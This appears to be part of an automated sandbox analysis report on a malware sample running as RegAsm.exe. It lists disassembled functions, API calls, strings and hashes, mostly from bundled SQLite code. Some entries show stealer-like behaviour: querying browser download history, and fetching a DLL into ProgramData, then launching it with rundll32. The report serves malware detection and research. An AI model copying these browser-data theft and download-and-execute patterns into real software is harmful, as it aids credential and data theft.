Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$H_prolog$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
String ID:
API String ID: 2058169020-0
Opcode ID: ecba2b5c013b2d55859bdf9cf2c9fbcd891d87259eb0bef2f95a7b0aa92ea699
Instruction ID: 4d87fc9032e85a53b1edc146e027e076b9390cc4878797034f6c2dc35de158f2
Opcode Fuzzy Hash: ecba2b5c013b2d55859bdf9cf2c9fbcd891d87259eb0bef2f95a7b0aa92ea699
Instruction Fuzzy Hash: AE41ECB2800119ABCF11EBE1DD49EDE77BCAB09314F4005AAB615E6151DB38D7C88B65

Function 1B3EB6E0 Relevance: 12.1, APIs: 8, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08d9faa40c2712bec288a282523ae37f3aecebe7185781e6a7e7855534c82517
Instruction ID: e55ad1913a610418725a276fe0805b40e7490c515569e62cc10c0ea1c8a3c0ba
Opcode Fuzzy Hash: 08d9faa40c2712bec288a282523ae37f3aecebe7185781e6a7e7855534c82517
Instruction Fuzzy Hash: 7511E9FE8046107FDA059B14EC42EAB776AEF91600F840559F84997210F736E939D2B2

Function 1B447920 Relevance: 10.8, APIs: 7, Instructions: 338COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
Instruction ID: f178421c8e0a3d91b75a3fc1bc4170f3f275e4c09aaa01aee470fea584da4baf
Opcode Fuzzy Hash: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
Instruction Fuzzy Hash: 8AB1CFB2A04702AFE704CF29CC81A9AB7E5FF88214F54852DF948D3711E735F9258BA1

Function 00408022 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00408027

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

lstrlenA.KERNEL32(00000000), ref: 004082F3
lstrlenA.KERNEL32(00000000), ref: 00408307

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00415718: _EH_prolog.MSVCRT ref: 0041571D
Part of subcall function 00415718: CreateThread.KERNEL32(00000000,00000000,00413F49,?,00000000,00000000), ref: 004157C3
Part of subcall function 00415718: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004157CB

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Strings

SELECT target_path, tab_url from downloads, xrefs: 004081C4
Downloads, xrefs: 00408057
Downloads, xrefs: 004080DA

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrlen$lstrcat$CreateObjectSingleThreadWait
String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
API String ID: 3193997572-2241552939
Opcode ID: 7a810ee922b9dd1d8d82e0cf4d524150274c9dca6b6d3f64bdff20660e1ff5ac
Instruction ID: a98216df2c24f67ee1f6effc05ffb8a4b83aafaedc0d259f9ad799ca18ecbe99
Opcode Fuzzy Hash: 7a810ee922b9dd1d8d82e0cf4d524150274c9dca6b6d3f64bdff20660e1ff5ac
Instruction Fuzzy Hash: E4B16231804288EEDB05EBE5DA55BEDBBB4AF14304F10405EE455B31C2EFB91B88DB66

Function 00414578 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 255COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041457D

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

Part of subcall function 00411805: _EH_prolog.MSVCRT ref: 0041180A
Part of subcall function 00411805: GetSystemTime.KERNEL32(?,00427520,00000001,000000C8,00000000,00427722), ref: 0041184A

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00404DCA: _EH_prolog.MSVCRT ref: 00404DCF
Part of subcall function 00404DCA: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E1E
Part of subcall function 00404DCA: StrCmpCA.SHLWAPI(?), ref: 00404E38
Part of subcall function 00404DCA: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E5C
Part of subcall function 00404DCA: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E7D
Part of subcall function 00404DCA: InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404EC8
Part of subcall function 00404DCA: CloseHandle.KERNEL32(?,?,00000400), ref: 00404EE2
Part of subcall function 00404DCA: InternetCloseHandle.WININET(00000000), ref: 00404EE9
Part of subcall function 00404DCA: InternetCloseHandle.WININET(?), ref: 00404EF2

ShellExecuteEx.SHELL32(?), ref: 0041484C

Strings

.dll, xrefs: 0041463F
"" , xrefs: 0041467E
C:\Windows\system32\rundll32.exe, xrefs: 00414771
C:\ProgramData\, xrefs: 004145C1

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$Internetlstrcpy$CloseHandle$FileOpenlstrcat$CreateExecuteReadShellSystemTimelstrlen
String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
API String ID: 1286380332-2108736111
Opcode ID: 77c66476d33b7e41345b0eb1dcd67f74b2127707f2f63ad43895d4c4fbe1ae55
Instruction ID: fe2c4395bdd824dfdc9fa3154de0270ea29dd1d711ee4d98875eeb780036671a
Opcode Fuzzy Hash: 77c66476d33b7e41345b0eb1dcd67f74b2127707f2f63ad43895d4c4fbe1ae55
Instruction Fuzzy Hash: 3FB14E71800298EADF15EBE5C955ADEBBB8BF18304F10405FE455B3182DBB82788DF66

Function 1B3E5930 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 234COMMON

Download Yara Rule

Strings

simple, xrefs: 1B3E5A38, 1B3E5A84, 1B3E5A95, 1B3E5B27
unknown tokenizer: %s, xrefs: 1B3E5B28
CREATE TABLE x(input, token, start, end, position), xrefs: 1B3E5933

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(input, token, start, end, position)$simple$unknown tokenizer: %s
API String ID: 0-2679805236
Opcode ID: c4b241c1bc343bfd7f23f72d46f18416bf3356eacd14de151bbda489fe208b6f
Instruction ID: 22cf741c89ff811b69b5f44d52d4df565a172470a25ad7e905c1ad265202ea5e
Opcode Fuzzy Hash: c4b241c1bc343bfd7f23f72d46f18416bf3356eacd14de151bbda489fe208b6f
Instruction Fuzzy Hash: 767106719043268FCB04CF28CC84ADAB7E9FF84254F46466EE885D7241FB71E959CBA1

Function 1B4EF0E0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 216COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4EF1DC, 1B4EF31D
%s at line %d of [%.10s], xrefs: 1B4EF1EB, 1B4EF32C
misuse, xrefs: 1B4EF1E6, 1B4EF327
unable to delete/modify user-function due to active statements, xrefs: 1B4EF157, 1B4EF298

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
API String ID: 0-3864549341
Opcode ID: d80f79bf15d13c2b7ff085e6fbbec600740aa19ab26d668ccf3762d3ce37603e
Instruction ID: 015be186196e7a6d82df9afe78876b307c0609d802040cb241944b5e6e56aec9
Opcode Fuzzy Hash: d80f79bf15d13c2b7ff085e6fbbec600740aa19ab26d668ccf3762d3ce37603e
Instruction Fuzzy Hash: E36176B5A00B416BF710AF20CC46BD7B799AF41306F04C12CF8559A3C2E7AEE5518BB2

Function 1B4009C2 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 176COMMON

Download Yara Rule

Strings

cannot UPDATE a subset of columns on fts5 contentless-delete table: %s, xrefs: 1B400B3B

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: cannot UPDATE a subset of columns on fts5 contentless-delete table: %s
API String ID: 0-2869280805
Opcode ID: 04811c01720f289ceb94babbefac592aa838c5d1fe3728e3d1cadd33b5d6d991
Instruction ID: 4c1c1d11accc84b17478deadfd27140acefcb28851b9f6766f4f54d1baf04859
Opcode Fuzzy Hash: 04811c01720f289ceb94babbefac592aa838c5d1fe3728e3d1cadd33b5d6d991
Instruction Fuzzy Hash: 2141A376B053059FDB009F99EC80AE6F3B5FF88225B00897EE64587711EB72E854C7A1

Function 1B3F3F30 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 169COMMON

Download Yara Rule

Strings

separators=, xrefs: 1B3F40A3
remove_diacritics=0, xrefs: 1B3F3FE1
tokenchars=, xrefs: 1B3F406A
remove_diacritics=2, xrefs: 1B3F4021
remove_diacritics=1, xrefs: 1B3F3FA2

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: remove_diacritics=0$remove_diacritics=1$remove_diacritics=2$separators=$tokenchars=
API String ID: 0-131617836
Opcode ID: cd8d6f9d1fa29453cf3c994f1d48bd3b03a86934398c8fb6d2aa36ce45afd203
Instruction ID: ac00a6017f2276322031470e3dda32f29c86cf145a2a2fc817f48764dea00eed
Opcode Fuzzy Hash: cd8d6f9d1fa29453cf3c994f1d48bd3b03a86934398c8fb6d2aa36ce45afd203
Instruction Fuzzy Hash: F051B776E042838BE300DF14D4807E6F7B1FB56724F8542ACE8869B645E732ED96C752

Function 1B3F1120 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

rbu_memory, xrefs: 1B3F11F5
main, xrefs: 1B3F11A6

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: main$rbu_memory
API String ID: 0-3973752345
Opcode ID: accbde548bcc1b816e3c69593b2df478fd45eec49fd3efdffca600ca3a543da7
Instruction ID: f6ca82115ae119769f7a2dc2fcaba6c2153f9ccb6b764f053aead3b09d2eef4a
Opcode Fuzzy Hash: accbde548bcc1b816e3c69593b2df478fd45eec49fd3efdffca600ca3a543da7
Instruction Fuzzy Hash: 5B51D4B66007019FDB00CFA6EC81B9AB7E8EF96215F04463EEC85D7201D735E969CB52

Function 1B4F9350 Relevance: 10.6, APIs: 7, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23d8c4edaa6ba98d20fdef7b2da2fc5666164a7d430a8aec40097faae1faad79
Instruction ID: 4f738333cad0121ca2c30c7feedab74ae0f572bed7f7ba2dba4545e6ca22cd08
Opcode Fuzzy Hash: 23d8c4edaa6ba98d20fdef7b2da2fc5666164a7d430a8aec40097faae1faad79
Instruction Fuzzy Hash: 405177B58002219BD7099F38DCCDA9637BCBFB0646B81422EEC46D3211D735E56CCB52

Function 1B4815C0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 135COMMON

Download Yara Rule

Strings

JSON cannot hold BLOB values, xrefs: 1B4816D9
null, xrefs: 1B4815EE
%!0.15g, xrefs: 1B48160A

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %!0.15g$JSON cannot hold BLOB values$null
API String ID: 0-3074873597
Opcode ID: dc033121144a4221da17bc87d57e62edf6cf2c7a966f9ebf9de8de7b06e7ec41
Instruction ID: 135d594692f11362d0d7f667bea5201368586509b92d5f83e98c7d9b1c32afc2
Opcode Fuzzy Hash: dc033121144a4221da17bc87d57e62edf6cf2c7a966f9ebf9de8de7b06e7ec41
Instruction Fuzzy Hash: 6E41C1B5A007006BF7105BD9EC82BD773B4DB45329F08462FF1D1E52C2D3A9A59983E1

Function 1B3F1D50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 132COMMON

Download Yara Rule

Strings

CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN), xrefs: 1B3F1E2C
no such database: %s, xrefs: 1B3F1E05

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN)$no such database: %s
API String ID: 0-1404816483
Opcode ID: b3e5fde2245446a67790981277638d6c70a44d9ba9bd0672dcb504fd66de7958
Instruction ID: 8365da3adcc330435c1890abb7e46b6669af647d6003b02e413ca2c60aac5995
Opcode Fuzzy Hash: b3e5fde2245446a67790981277638d6c70a44d9ba9bd0672dcb504fd66de7958
Instruction Fuzzy Hash: 5F3149766003096BD7105F6AEC51BEBF7D8EF81225F00426DFD4897240DA7AF81087E1

